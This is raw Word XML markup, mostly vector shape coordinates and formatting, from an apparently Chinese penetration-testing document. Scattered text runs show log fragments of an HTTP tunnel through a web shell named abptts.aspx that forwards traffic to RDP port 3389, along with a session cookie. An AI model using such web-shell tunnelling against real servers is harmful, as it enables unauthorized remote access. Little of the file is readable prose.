10475,13141,10478,13141,10481,13141,10484,13141,10484,13141,10484,13141,10484,13141,10484,13141,10484,13141,10484,13141,10484,13141,10484,13141,10484,13141,10484,13141,10484,13141,10484,13141,10484,13141,10484,13141,10484,13141,10484,13141,10484,13141,10484,13141,10484,13142,10484,13142,10484,13142,10484,13142,10484,13142,10484,13142,10484,13143,10484,13143,10484,13143,10484,13144,10484,13144,10484,13144,10484,13145,10484,13145,10484,13146,10484,13146,10484,13147,10484,13147,10484,13148,10484,13148,10484,13149,10484,13150,10484,13150,10484,13151,10484,13152,10484,13153,10484,13154,10484,13154,10484,13155,10484,13156,10484,13157,10484,13158,10484,13160,10484,13161,10484,13162,10484,13163,10484,13164,10484,13166,10484,13167,10484,13169,10484,13170,10484,13172,10484,13173,10484,13175,10484,13177,10484,13178,10484,13180,10484,13182,10484,13184,10484,13186,10484,13188,10484,13190,10484,13193,10484,13195,10484,13197,10484,13200,10484,13202,10484,13204,10484,13207,10484,13210,10484,13212,10484,13215,10484,13218,10484,13221,10484,13224,10484,13227,10484,13230,10484,13234,10484,13237,10484,13240,10484,13244,10484,13247,10484,13251,10484,13255,10484,13259,10484,13262,10484,13266,10484,13270,10484,13275,10484,13279,10484,13283,10484,13288,10484,13292,10484,13297,10484,13301,10484,13306,10484,13311,10484,13316,10484,13321,10484,13326,10484,13331,10484,13337,10484,13342,10484,13348,10484,13353,10484,13359,10484,13365,10484,13371,10484,13377,10484,13383,10484,13389,10484,13396,10484,13396,10484,13396,10484,13396,10484,13396,10484,13396,10484,13396,10484,13396,10484,13396,10484,13396,10484,13396,10484,13396,10484,13396,10484,13396,10484,13396,10484,13396,10484,13396,10484,13396,10484,13396,10484,13396,10484,13396,10484,13396,10484,13396,10484,13396,10483,13396,10483,13396,10483,13396,10483,13396,10483,13396,10483,13396,10483,13396,10482,13396,10482,13396,10482,13396,10482,13396,10481,13396,10481,13396,10481,13396,10481,13396,10480,13396,10480,13396,10480,13396,10479,13396,10479,13396,10479,13396,10478,13396,10478,13396,10477,13396,10477,13396,10476,13396,10476,13396,10475,13396,10475,13396,10474,13396,10474,13396,10473,13396,10472,13396,10472,13396,10471,13396,10470,13396,10470,13396,10469,13396,10468,13396,10467,13396,10466,13396,10466,13396,10465,13396,10464,13396,10463,13396,10462,13396,10461,13396,10460,13396,10459,13396,10458,13396,10457,13396,10455,13396,10454,13396,10453,13396,10452,13396,10450,13396,10449,13396,10448,13396,10446,13396,10445,13396,10444,13396,10442,13396,10441,13396,10439,13396,10437,13396,10436,13396,10434,13396,10432,13396,10431,13396,10429,13396,10427,13396,10425,13396,10423,13396,10421,13396,10419,13396,10417,13396,10415,13396,10413,13396,10411,13396,10409,13396,10406,13396,10404,13396,10402,13396,10399,13396,10397,13396,10395,13396,10392,13396,10389,13396,10387,13396,10384,13396,10381,13396,10379,13396,10376,13396,10373,13396,10370,13396,10367,13396,10364,13396,10364,13396,10364,13396,10364,13396,10364,13396,10364,13396,10364,13396,10364,13396,10364,13396,10364,13396,10364,13396,10364,13396,10364,13396,10364,13395,10364,13395,10364,13395,10364,13395,10364,13395,10364,13395,10364,13395,10364,13395,10364,13395,10364,13394,10364,13394,10364,13394,10364,13394,10364,13393,10364,13393,10364,13393,10364,13392,10364,13392,10364,13392,10364,13391,10364,13391,10364,13390,10364,13390,10364,13389,10364,13389,10364,13388,10364,13387,10364,13387,10364,13386,10364,13385,10364,13385,10364,13384,10364,13383,10364,13382,10364,13381,10364,13380,10364,13379,10364,13378,10364,13377,10364,13376,10364,13374,10364,13373,10364,13372,10364,13371,10364,13369,10364,13368,10364,13366,10364,13365,10364,13363,10364,13361,10364,13360,10364,13358,10364,13356,10364,13354,10364,13352,10364,13350,10364,13348,10364,13346,10364,13344,10364,13342,10364,13339,10364,13337,10364,13334,10364,13332,10364,13329,10364,13327,10364,13324,10364,13321,10364,13318,10364,13315,10364,13312,10364,13309,10364,13306,10364,13303,10364,13299,10364,13296,10364,13293,10364,13289,10364,13285,10364,13282,10364,13278,10364,13274,10364,13270,10364,13266,10364,13262,10364,13258,10364,13253,10364,13249,10364,13244,10364,13240,10364,13235,10364,13230,10364,13225,10364,13220,10364,13215,10364,13210,10364,13205,10364,13200,10364,13194,10364,13189,10364,13183,10364,13177,10364,13171,10364,13165,10364,13159,10364,13153,10364,13147,10364,13141e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:85.500pt;margin-top:669.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1710,13390" coordsize="250,270">
        <v:shape style="position:absolute;left:1710;top:13390;width:250;height:270" coordorigin="1710,13390" coordsize="250,270" path="m1720,13411l1720,13411,1720,13411,1720,13411,1720,13411,1720,13411,1720,13411,1720,13411,1720,13411,1720,13411,1720,13411,1720,13411,1720,13411,1720,13411,1720,13411,1720,13411,1720,13411,1720,13411,1721,13411,1721,13411,1721,13411,1721,13411,1721,13411,1721,13411,1722,13411,1722,13411,1722,13411,1722,13411,1723,13411,1723,13411,1723,13411,1724,13411,1724,13411,1725,13411,1725,13411,1725,13411,1726,13411,1727,13411,1727,13411,1728,13411,1728,13411,1729,13411,1730,13411,1730,13411,1731,13411,1732,13411,1733,13411,1734,13411,1735,13411,1736,13411,1737,13411,1738,13411,1739,13411,1740,13411,1741,13411,1742,13411,1744,13411,1745,13411,1746,13411,1748,13411,1749,13411,1751,13411,1752,13411,1754,13411,1755,13411,1757,13411,1759,13411,1761,13411,1763,13411,1765,13411,1767,13411,1769,13411,1771,13411,1773,13411,1775,13411,1778,13411,1780,13411,1782,13411,1785,13411,1787,13411,1790,13411,1793,13411,1796,13411,1798,13411,1801,13411,1804,13411,1807,13411,1810,13411,1814,13411,1817,13411,1820,13411,1824,13411,1827,13411,1831,13411,1834,13411,1838,13411,1842,13411,1846,13411,1850,13411,1854,13411,1858,13411,1862,13411,1867,13411,1871,13411,1876,13411,1880,13411,1885,13411,1890,13411,1894,13411,1899,13411,1904,13411,1910,13411,1915,13411,1920,13411,1925,13411,1931,13411,1937,13411,1942,13411,1948,13411,1954,13411,1960,13411,1960,13411,1960,13411,1960,13411,1960,13411,1960,13411,1960,13411,1960,13411,1960,13411,1960,13411,1960,13411,1960,13411,1960,13411,1960,13411,1960,13411,1960,13411,1960,13411,1960,13411,1960,13412,1960,13412,1960,13412,1960,13412,1960,13412,1960,13412,1960,13413,1960,13413,1960,13413,1960,13413,1960,13414,1960,13414,1960,13414,1960,13415,1960,13415,1960,13416,1960,13416,1960,13417,1960,13417,1960,13418,1960,13418,1960,13419,1960,13420,1960,13420,1960,13421,1960,13422,1960,13423,1960,13424,1960,13425,1960,13425,1960,13426,1960,13428,1960,13429,1960,13430,1960,13431,1960,13432,1960,13433,1960,13435,1960,13436,1960,13437,1960,13439,1960,13440,1960,13442,1960,13443,1960,13445,1960,13447,1960,13449,1960,13450,1960,13452,1960,13454,1960,13456,1960,13458,1960,13460,1960,13463,1960,13465,1960,13467,1960,13470,1960,13472,1960,13475,1960,13477,1960,13480,1960,13483,1960,13485,1960,13488,1960,13491,1960,13494,1960,13497,1960,13500,1960,13504,1960,13507,1960,13510,1960,13514,1960,13517,1960,13521,1960,13525,1960,13529,1960,13533,1960,13537,1960,13541,1960,13545,1960,13549,1960,13553,1960,13558,1960,13562,1960,13567,1960,13571,1960,13576,1960,13581,1960,13586,1960,13591,1960,13596,1960,13601,1960,13607,1960,13612,1960,13618,1960,13623,1960,13629,1960,13635,1960,13641,1960,13647,1960,13653,1960,13660,1960,13666,1960,13666,1960,13666,1960,13666,1960,13666,1960,13666,1960,13666,1960,13666,1960,13666,1960,13666,1960,13666,1960,13666,1960,13666,1960,13666,1960,13666,1960,13666,1960,13666,1959,13666,1959,13666,1959,13666,1959,13666,1959,13666,1959,13666,1958,13666,1958,13666,1958,13666,1958,13666,1957,13666,1957,13666,1957,13666,1957,13666,1956,13666,1956,13666,1955,13666,1955,13666,1954,13666,1954,13666,1953,13666,1953,13666,1952,13666,1952,13666,1951,13666,1950,13666,1949,13666,1949,13666,1948,13666,1947,13666,1946,13666,1945,13666,1944,13666,1943,13666,1942,13666,1941,13666,1940,13666,1939,13666,1938,13666,1936,13666,1935,13666,1934,13666,1932,13666,1931,13666,1929,13666,1928,13666,1926,13666,1924,13666,1923,13666,1921,13666,1919,13666,1917,13666,1915,13666,1913,13666,1911,13666,1909,13666,1907,13666,1905,13666,1902,13666,1900,13666,1897,13666,1895,13666,1892,13666,1890,13666,1887,13666,1884,13666,1881,13666,1879,13666,1876,13666,1872,13666,1869,13666,1866,13666,1863,13666,1860,13666,1856,13666,1853,13666,1849,13666,1845,13666,1842,13666,1838,13666,1834,13666,1830,13666,1826,13666,1822,13666,1817,13666,1813,13666,1809,13666,1804,13666,1800,13666,1795,13666,1790,13666,1785,13666,1780,13666,1775,13666,1770,13666,1765,13666,1760,13666,1754,13666,1749,13666,1743,13666,1738,13666,1732,13666,1726,13666,1720,13666,1720,13666,1720,13666,1720,13666,1720,13666,1720,13666,1720,13666,1720,13666,1720,13666,1720,13666,1720,13666,1720,13666,1720,13666,1720,13666,1720,13666,1720,13665,1720,13665,1720,13665,1720,13665,1720,13665,1720,13665,1720,13665,1720,13664,1720,13664,1720,13664,1720,13664,1720,13664,1720,13663,1720,13663,1720,13663,1720,13662,1720,13662,1720,13661,1720,13661,1720,13660,1720,13660,1720,13659,1720,13659,1720,13658,1720,13658,1720,13657,1720,13656,1720,13655,1720,13655,1720,13654,1720,13653,1720,13652,1720,13651,1720,13650,1720,13649,1720,13648,1720,13647,1720,13646,1720,13645,1720,13643,1720,13642,1720,13641,1720,13639,1720,13638,1720,13636,1720,13635,1720,13633,1720,13632,1720,13630,1720,13628,1720,13626,1720,13624,1720,13622,1720,13620,1720,13618,1720,13616,1720,13614,1720,13612,1720,13609,1720,13607,1720,13605,1720,13602,1720,13599,1720,13597,1720,13594,1720,13591,1720,13588,1720,13585,1720,13582,1720,13579,1720,13576,1720,13573,1720,13570,1720,13566,1720,13563,1720,13559,1720,13556,1720,13552,1720,13548,1720,13544,1720,13540,1720,13536,1720,13532,1720,13528,1720,13523,1720,13519,1720,13514,1720,13510,1720,13505,1720,13500,1720,13496,1720,13491,1720,13486,1720,13480,1720,13475,1720,13470,1720,13464,1720,13459,1720,13453,1720,13447,1720,13442,1720,13436,1720,13430,1720,13423,1720,13417,1720,13411e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:132.500pt;margin-top:688.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2650,13770" coordsize="130,270">
        <v:shape style="position:absolute;left:2650;top:13770;width:130;height:270" coordorigin="2650,13770" coordsize="130,270" path="m2665,13786l2665,13786,2665,13786,2665,13786,2665,13786,2665,13786,2665,13786,2665,13786,2665,13786,2665,13786,2665,13786,2665,13786,2665,13786,2665,13786,2665,13786,2666,13786,2666,13786,2666,13786,2666,13786,2666,13786,2666,13786,2666,13786,2666,13786,2666,13786,2666,13786,2666,13786,2666,13786,2667,13786,2667,13786,2667,13786,2667,13786,2667,13786,2667,13786,2668,13786,2668,13786,2668,13786,2668,13786,2669,13786,2669,13786,2669,13786,2670,13786,2670,13786,2670,13786,2671,13786,2671,13786,2671,13786,2672,13786,2672,13786,2673,13786,2673,13786,2674,13786,2674,13786,2675,13786,2675,13786,2676,13786,2677,13786,2677,13786,2678,13786,2679,13786,2679,13786,2680,13786,2681,13786,2682,13786,2682,13786,2683,13786,2684,13786,2685,13786,2686,13786,2687,13786,2688,13786,2689,13786,2690,13786,2691,13786,2692,13786,2693,13786,2694,13786,2695,13786,2697,13786,2698,13786,2699,13786,2700,13786,2702,13786,2703,13786,2705,13786,2706,13786,2708,13786,2709,13786,2711,13786,2712,13786,2714,13786,2716,13786,2717,13786,2719,13786,2721,13786,2723,13786,2725,13786,2726,13786,2728,13786,2730,13786,2732,13786,2734,13786,2737,13786,2739,13786,2741,13786,2743,13786,2745,13786,2748,13786,2750,13786,2753,13786,2755,13786,2758,13786,2760,13786,2763,13786,2765,13786,2768,13786,2771,13786,2774,13786,2777,13786,2779,13786,2782,13786,2785,13786,2785,13786,2785,13786,2785,13786,2785,13786,2785,13786,2785,13786,2785,13786,2785,13786,2785,13786,2785,13786,2785,13786,2785,13786,2785,13786,2785,13786,2785,13786,2785,13786,2785,13787,2785,13787,2785,13787,2785,13787,2785,13787,2785,13787,2785,13788,2785,13788,2785,13788,2785,13788,2785,13789,2785,13789,2785,13789,2785,13790,2785,13790,2785,13790,2785,13791,2785,13791,2785,13792,2785,13792,2785,13793,2785,13794,2785,13794,2785,13795,2785,13796,2785,13796,2785,13797,2785,13798,2785,13799,2785,13800,2785,13801,2785,13802,2785,13803,2785,13804,2785,13805,2785,13806,2785,13807,2785,13808,2785,13810,2785,13811,2785,13813,2785,13814,2785,13815,2785,13817,2785,13819,2785,13820,2785,13822,2785,13824,2785,13826,2785,13828,2785,13829,2785,13831,2785,13834,2785,13836,2785,13838,2785,13840,2785,13842,2785,13845,2785,13847,2785,13850,2785,13852,2785,13855,2785,13858,2785,13861,2785,13863,2785,13866,2785,13869,2785,13873,2785,13876,2785,13879,2785,13882,2785,13886,2785,13889,2785,13893,2785,13896,2785,13900,2785,13904,2785,13908,2785,13912,2785,13916,2785,13920,2785,13924,2785,13928,2785,13933,2785,13937,2785,13942,2785,13947,2785,13951,2785,13956,2785,13961,2785,13966,2785,13971,2785,13977,2785,13982,2785,13987,2785,13993,2785,13999,2785,14004,2785,14010,2785,14016,2785,14022,2785,14028,2785,14035,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2785,14041,2784,14041,2784,14041,2784,14041,2784,14041,2784,14041,2784,14041,2783,14041,2783,14041,2783,14041,2783,14041,2783,14041,2782,14041,2782,14041,2782,14041,2781,14041,2781,14041,2781,14041,2780,14041,2780,14041,2780,14041,2779,14041,2779,14041,2778,14041,2778,14041,2778,14041,2777,14041,2776,14041,2776,14041,2775,14041,2775,14041,2774,14041,2774,14041,2773,14041,2772,14041,2772,14041,2771,14041,2770,14041,2769,14041,2768,14041,2768,14041,2767,14041,2766,14041,2765,14041,2764,14041,2763,14041,2762,14041,2761,14041,2760,14041,2759,14041,2758,14041,2757,14041,2755,14041,2754,14041,2753,14041,2752,14041,2750,14041,2749,14041,2748,14041,2746,14041,2745,14041,2743,14041,2742,14041,2740,14041,2738,14041,2737,14041,2735,14041,2733,14041,2732,14041,2730,14041,2728,14041,2726,14041,2724,14041,2722,14041,2720,14041,2718,14041,2716,14041,2714,14041,2712,14041,2710,14041,2708,14041,2705,14041,2703,14041,2701,14041,2698,14041,2696,14041,2693,14041,2691,14041,2688,14041,2685,14041,2683,14041,2680,14041,2677,14041,2674,14041,2671,14041,2668,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14041,2665,14040,2665,14040,2665,14040,2665,14040,2665,14040,2665,14040,2665,14039,2665,14039,2665,14039,2665,14039,2665,14038,2665,14038,2665,14038,2665,14037,2665,14037,2665,14037,2665,14036,2665,14036,2665,14035,2665,14035,2665,14034,2665,14033,2665,14033,2665,14032,2665,14031,2665,14031,2665,14030,2665,14029,2665,14028,2665,14027,2665,14026,2665,14025,2665,14024,2665,14023,2665,14022,2665,14021,2665,14020,2665,14019,2665,14017,2665,14016,2665,14014,2665,14013,2665,14012,2665,14010,2665,14008,2665,14007,2665,14005,2665,14003,2665,14001,2665,13999,2665,13998,2665,13996,2665,13993,2665,13991,2665,13989,2665,13987,2665,13985,2665,13982,2665,13980,2665,13977,2665,13975,2665,13972,2665,13969,2665,13966,2665,13964,2665,13961,2665,13958,2665,13955,2665,13951,2665,13948,2665,13945,2665,13941,2665,13938,2665,13934,2665,13931,2665,13927,2665,13923,2665,13919,2665,13915,2665,13911,2665,13907,2665,13903,2665,13899,2665,13894,2665,13890,2665,13885,2665,13880,2665,13876,2665,13871,2665,13866,2665,13861,2665,13856,2665,13850,2665,13845,2665,13840,2665,13834,2665,13828,2665,13823,2665,13817,2665,13811,2665,13805,2665,13799,2665,13792,2665,13786e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:688.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,13770" coordsize="130,270">
        <v:shape style="position:absolute;left:3010;top:13770;width:130;height:270" coordorigin="3010,13770" coordsize="130,270" path="m3026,13786l3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3026,13786,3027,13786,3027,13786,3027,13786,3027,13786,3027,13786,3027,13786,3027,13786,3028,13786,3028,13786,3028,13786,3028,13786,3029,13786,3029,13786,3029,13786,3029,13786,3030,13786,3030,13786,3030,13786,3031,13786,3031,13786,3032,13786,3032,13786,3032,13786,3033,13786,3033,13786,3034,13786,3034,13786,3035,13786,3036,13786,3036,13786,3037,13786,3037,13786,3038,13786,3039,13786,3039,13786,3040,13786,3041,13786,3042,13786,3043,13786,3043,13786,3044,13786,3045,13786,3046,13786,3047,13786,3048,13786,3049,13786,3050,13786,3051,13786,3052,13786,3053,13786,3054,13786,3056,13786,3057,13786,3058,13786,3059,13786,3061,13786,3062,13786,3063,13786,3065,13786,3066,13786,3068,13786,3069,13786,3071,13786,3072,13786,3074,13786,3076,13786,3077,13786,3079,13786,3081,13786,3083,13786,3085,13786,3087,13786,3089,13786,3091,13786,3093,13786,3095,13786,3097,13786,3099,13786,3101,13786,3103,13786,3106,13786,3108,13786,3110,13786,3113,13786,3115,13786,3118,13786,3120,13786,3123,13786,3126,13786,3128,13786,3131,13786,3134,13786,3137,13786,3140,13786,3143,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13786,3146,13787,3146,13787,3146,13787,3146,13787,3146,13787,3146,13787,3146,13788,3146,13788,3146,13788,3146,13788,3146,13789,3146,13789,3146,13789,3146,13790,3146,13790,3146,13790,3146,13791,3146,13791,3146,13792,3146,13792,3146,13793,3146,13794,3146,13794,3146,13795,3146,13796,3146,13796,3146,13797,3146,13798,3146,13799,3146,13800,3146,13801,3146,13802,3146,13803,3146,13804,3146,13805,3146,13806,3146,13807,3146,13808,3146,13810,3146,13811,3146,13813,3146,13814,3146,13815,3146,13817,3146,13819,3146,13820,3146,13822,3146,13824,3146,13826,3146,13828,3146,13829,3146,13831,3146,13834,3146,13836,3146,13838,3146,13840,3146,13842,3146,13845,3146,13847,3146,13850,3146,13852,3146,13855,3146,13858,3146,13861,3146,13863,3146,13866,3146,13869,3146,13873,3146,13876,3146,13879,3146,13882,3146,13886,3146,13889,3146,13893,3146,13896,3146,13900,3146,13904,3146,13908,3146,13912,3146,13916,3146,13920,3146,13924,3146,13928,3146,13933,3146,13937,3146,13942,3146,13947,3146,13951,3146,13956,3146,13961,3146,13966,3146,13971,3146,13977,3146,13982,3146,13987,3146,13993,3146,13999,3146,14004,3146,14010,3146,14016,3146,14022,3146,14028,3146,14035,3146,14041,3146,14041,3146,14041,3146,14041,3146,14041,3146,14041,3146,14041,3146,14041,3146,14041,3146,14041,3146,14041,3146,14041,3145,14041,3145,14041,3145,14041,3145,14041,3145,14041,3145,14041,3145,14041,3145,14041,3145,14041,3145,14041,3145,14041,3145,14041,3145,14041,3145,14041,3144,14041,3144,14041,3144,14041,3144,14041,3144,14041,3144,14041,3143,14041,3143,14041,3143,14041,3143,14041,3143,14041,3142,14041,3142,14041,3142,14041,3141,14041,3141,14041,3141,14041,3140,14041,3140,14041,3140,14041,3139,14041,3139,14041,3138,14041,3138,14041,3137,14041,3137,14041,3136,14041,3136,14041,3135,14041,3134,14041,3134,14041,3133,14041,3132,14041,3132,14041,3131,14041,3130,14041,3129,14041,3129,14041,3128,14041,3127,14041,3126,14041,3125,14041,3124,14041,3123,14041,3122,14041,3121,14041,3120,14041,3119,14041,3118,14041,3117,14041,3116,14041,3114,14041,3113,14041,3112,14041,3110,14041,3109,14041,3108,14041,3106,14041,3105,14041,3103,14041,3102,14041,3100,14041,3099,14041,3097,14041,3095,14041,3094,14041,3092,14041,3090,14041,3088,14041,3086,14041,3084,14041,3083,14041,3081,14041,3079,14041,3076,14041,3074,14041,3072,14041,3070,14041,3068,14041,3065,14041,3063,14041,3061,14041,3058,14041,3056,14041,3053,14041,3051,14041,3048,14041,3045,14041,3043,14041,3040,14041,3037,14041,3034,14041,3031,14041,3029,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14041,3026,14040,3026,14040,3026,14040,3026,14040,3026,14040,3026,14040,3026,14039,3026,14039,3026,14039,3026,14039,3026,14038,3026,14038,3026,14038,3026,14037,3026,14037,3026,14037,3026,14036,3026,14036,3026,14035,3026,14035,3026,14034,3026,14033,3026,14033,3026,14032,3026,14031,3026,14031,3026,14030,3026,14029,3026,14028,3026,14027,3026,14026,3026,14025,3026,14024,3026,14023,3026,14022,3026,14021,3026,14020,3026,14019,3026,14017,3026,14016,3026,14014,3026,14013,3026,14012,3026,14010,3026,14008,3026,14007,3026,14005,3026,14003,3026,14001,3026,13999,3026,13998,3026,13996,3026,13993,3026,13991,3026,13989,3026,13987,3026,13985,3026,13982,3026,13980,3026,13977,3026,13975,3026,13972,3026,13969,3026,13966,3026,13964,3026,13961,3026,13958,3026,13955,3026,13951,3026,13948,3026,13945,3026,13941,3026,13938,3026,13934,3026,13931,3026,13927,3026,13923,3026,13919,3026,13915,3026,13911,3026,13907,3026,13903,3026,13899,3026,13894,3026,13890,3026,13885,3026,13880,3026,13876,3026,13871,3026,13866,3026,13861,3026,13856,3026,13850,3026,13845,3026,13840,3026,13834,3026,13828,3026,13823,3026,13817,3026,13811,3026,13805,3026,13799,3026,13792,3026,1378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29.077967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Disengaging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tunnel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8861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3389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29.077987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Closing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socket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8861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29.078049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Exception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while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closing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socket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8861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Errno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107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Transport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endpoint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ot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connected</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114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29.085280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closed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CEA116F4AF1FA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F8C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36.957446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33389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36.957601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Waiting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.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333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89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36.957797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Connecting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via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.119/abptts.aspx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36.966507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cookie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ASP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NET_SessionId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bsynu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c3l5ndo5h0n0bhtrv5p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path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HttpOnly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="141" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="144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36.966587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S2C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8862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ID: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AA0FE7F073A5EFFD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created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AA0FE7F073A5EFFD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45.321612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C2S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8862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389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ID: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AA0FE7F073A5EFFD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25805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bytes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sent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since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last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report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="141" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="144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45.321700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S2C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8862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ID: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AA0FE7F073A5EFFD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12344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sent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since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last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report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48.482758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C2S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8862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389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ID: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AA0FE7F073A5EFFD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715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bytes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ent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since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last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report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="141" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="144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48.482838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S2C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8862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ID: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AA0FE7F073A5EFFD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2524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sent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since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last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report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="107" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263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54.169354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Connection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level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exception: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Errno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onnection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reset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peer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tunnel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8862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3389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9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54.169432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Disengaging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tunnel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8862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3389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54.169455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Closing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socket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8862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54.169529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Exception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while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closing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socket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8862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Errno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107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Transport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endpoint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ot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connected</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114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28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54.178078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closed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AA0FE7F073A5E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FFD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177.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId14" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:266.399pt;width:388.800pt;height:243.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId15" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:454.200pt;margin-top:600.0pt;width:7.200pt;height:8.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId1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非常遗憾的是，目前不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支持PHP。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